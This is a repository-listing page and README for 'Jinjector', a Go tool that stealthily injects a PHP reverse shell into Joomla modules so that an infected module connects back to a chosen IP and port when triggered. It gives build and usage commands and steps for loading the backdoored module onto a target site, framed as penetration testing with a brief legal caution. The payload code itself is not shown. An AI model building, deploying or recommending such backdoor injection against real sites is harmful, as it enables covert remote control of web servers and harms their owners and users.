https://github.com/giovanni-iannaccone/jinjector
Joomla modules backdoor injector 🚪
https://github.com/giovanni-iannaccone/jinjector
backdoor golang golang-hacking hacking injection injector joomla joomla-hacking joomla-module php-backdoor
Last synced: 10 months ago
JSON representation
Joomla modules backdoor injector 🚪
- Host: GitHub
- URL: https://github.com/giovanni-iannaccone/jinjector
- Owner: giovanni-iannaccone
- License: gpl-3.0
- Created: 2024-11-03T09:38:59.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-05-18T16:31:08.000Z (about 1 year ago)
- Last Synced: 2025-05-18T17:30:19.050Z (about 1 year ago)
- Topics: backdoor, golang, golang-hacking, hacking, injection, injector, joomla, joomla-hacking, joomla-module, php-backdoor
- Language: Go
- Homepage:
- Size: 38.1 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
( It's pronounced "J in jek′tər" - J injector )
Jinjector is a powerful tool written in Go, designed to inject backdoors into Joomla modules effortlessly. Using this tool, you can easily insert a PHP reverse shell into a Joomla module's main file, allowing a connection back to a specified IP and port whenever the module is triggered. This is perfect for penetration testers or researchers aiming to simulate real-world scenarios.
> [!CAUTION]
> This tool is intended for educational and ethical testing purposes only. Unauthorized use of this tool on live systems without permission is illegal and unethical.
## ✨ Features
- Automatic file discovery: Extracts information from the Joomla XML manifest file to locate the main file.
- Stealthy injection: Injects a PHP reverse shell that connects back to your specified IP and port.
- Ease of use: Specify your IP, port, and the module directory, and let Jinjector handle the rest.
## 📦 Requirements
- Go
- Joomla module directory (with a valid manifest.xml file)
## 🛠️ Installation
1. Clone the repository
```bash
git clone https://github.com/giovanni-iannaccone/Jinjector
cd Jinjector
```
2. Build
```bash
cd cmd
go build -o jinjector
```
## 🚀 Usage
1. Run the program
```
jinjector --ip=YOUR_IP --port=YOUR_PORT --path=YOUR_PATH --backdoor=BACKDOOR_PATH
```
2. Load the infected module on the target site
3. Start an http client on the port your gave in the previous step
4. Trigger the module by sendign a request to its position
## 🌍 How It Works
**Manifest Extraction**: Jinjector parses the XML file in the given module directory to identify the main PHP file.
**Payload Injection**: Once located, it appends a PHP reverse shell payload to the main file.
**Connection Setup**: Every time the infected Joomla module is used, it attempts to establish a connection to your IP and port.
## ⚡️ Reverse Shell Code
The reverse shell code injected is just a proof of concept, designed to open a connection to the specified IP and port. You can modify the payload if needed for specific testing purposes (backdoor.php file)
I used the pentestmonkey php reverse shell
## 🧩 Contributing
We welcome contributions! Please follow these steps:
1. Fork the repository.
2. Create a new branch ( using this convention).
3. Make your changes and commit them with descriptive messages.
4. Push your changes to your fork.
5. Create a pull request to the main repository.
## ⚖ License
This project is licensed under the GPL-3.0 License. See the LICENSE file for details.
## ⚔ Contact
- For any inquiries or support, please contact iannacconegiovanni444@gmail.com .
- Visit my site for more informations about me and my work https://giovanni-iannaccone.github.io
🐞 Happy Hacking ...